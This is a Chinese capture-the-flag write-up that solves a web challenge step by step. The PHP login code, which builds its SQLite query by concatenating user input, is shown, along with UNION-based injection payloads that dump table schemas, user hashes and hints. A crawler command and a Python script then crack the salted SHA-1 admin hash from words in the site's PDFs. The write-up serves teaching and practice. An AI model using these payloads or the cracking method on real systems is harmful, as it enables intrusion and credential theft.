题目:
解题:
打开页面全是乱七八糟的跳转,没有思路,之后看了writeup做的。
扫描目录
扫到一个login.php,查看源码,发现参数debug,传参?debug=1,得到如下代码:
<?php
if(isset($_POST['usr']) && isset($_POST['pw'])){
$user = $_POST['usr'];
$pass = $_POST['pw'];
$db = new SQLite3('../fancy.db');
$res = $db->query("SELECT id,name from Users where name='".$user."' and password='".sha1($pass."Salz!")."'");
if($res){
$row = $res->fetchArray();
}
else{
echo "<br>Some Error occourred!";
}
if(isset($row['id'])){
setcookie('name',' '.$row['name'], time() + 60, '/');
header("Location: /");
die();
}
}
if(isset($_GET['debug']))
highlight_file('login.php');
?>sql查询可以轻松闭合,但是这里并没有要给flag的意思,bp抓包再对username进行注入,看响应头有没有给出信息:
构造usr=' union select name,sql from sqlite_master--+&pw=
为什么要查询sql呢,这涉及到sqlite自带的结构表sqlite_master,sql是sqlite_master中的一个字段,注入时经常用到的,注入后响应头的set-cookie:
set-cookie也就是:
CREATE TABLE Users( id int primary key, name varchar(255), password varchar(255), hint varchar(255) )
这就出现了表名和表中的字段了,仍然在usr处用limit进行移位并查询:
usr=%27 UNION SELECT id, id from Users limit 0,1--+&pw=chybeta usr=%27 UNION SELECT id, name from Users limit 0,1--+&pw=chybeta usr=%27 UNION SELECT id, password from Users limit 0,1--+&pw=chybeta usr=%27 UNION SELECT id, hint from Users limit 0,1--+&pw=chybeta
得到数据
admin 3fab54a50e770d830c0416df817567662a9dc85c +my+fav+word+in+my+fav+paper?! fritze 54eae8935c90f467427f05e4ece82cf569f89507 +my+love+is� hansi 34b0bb7c304949f9ff2fc101eef0f048be10d3bd +the+password+is+password
上面的源码中的查询语句的password就是对密码+salt进行了sha1,我们登陆的话应该需要利用sha1函数和salt找出密码,admin的hint是 +my+fav+word+in+my+fav+paper?!,那会不会密码藏在pdf文件中呢?
wget ip -r -np -nd -A .pdf
爬取站点中所有的pdf文件,总共30个,然后用脚本进行解析处理,并用sha1函数与加密的密码进行碰撞已找出正确的密码,拿大佬的脚本:
# -*- coding:utf-8 -*-
from cStringIO import StringIO
from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter
from pdfminer.converter import TextConverter
from pdfminer.layout import LAParams
from pdfminer.pdfpage import PDFPage
import os
import hashlib
#解决UnicodeEncodeError: 'ascii' codec can't encode character u'\xe9' in
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
#
def get_pdf():
return [i for i in os.listdir("./") if i.endswith("pdf")]
def convert_pdf_2_text(path):
rsrcmgr = PDFResourceManager()
retstr = StringIO()
device = TextConverter(rsrcmgr, retstr, codec='utf-8', laparams=LAParams())
interpreter = PDFPageInterpreter(rsrcmgr, device)
with open(path, 'rb') as fp:
for page in PDFPage.get_pages(fp, set()):
interpreter.process_page(page)
text = retstr.getvalue()
device.close()
retstr.close()
return text
def find_password():
pdf_path = get_pdf()
for i in pdf_path:
print "Searching word in " + i
pdf_text = convert_pdf_2_text(i).split(" ")
for word in pdf_text:
sha1_password = hashlib.sha1(word+"Salz!").hexdigest()
if sha1_password == '3fab54a50e770d830c0416df817567662a9dc85c':
print "Find the password :" + word
exit()
if __name__ == "__main__":
find_password()得到密码为ThinJerboa,登陆admin.php,得到flag
flag{Th3_Fl4t_Earth_Prof_i$_n0T_so_Smart_huh?}
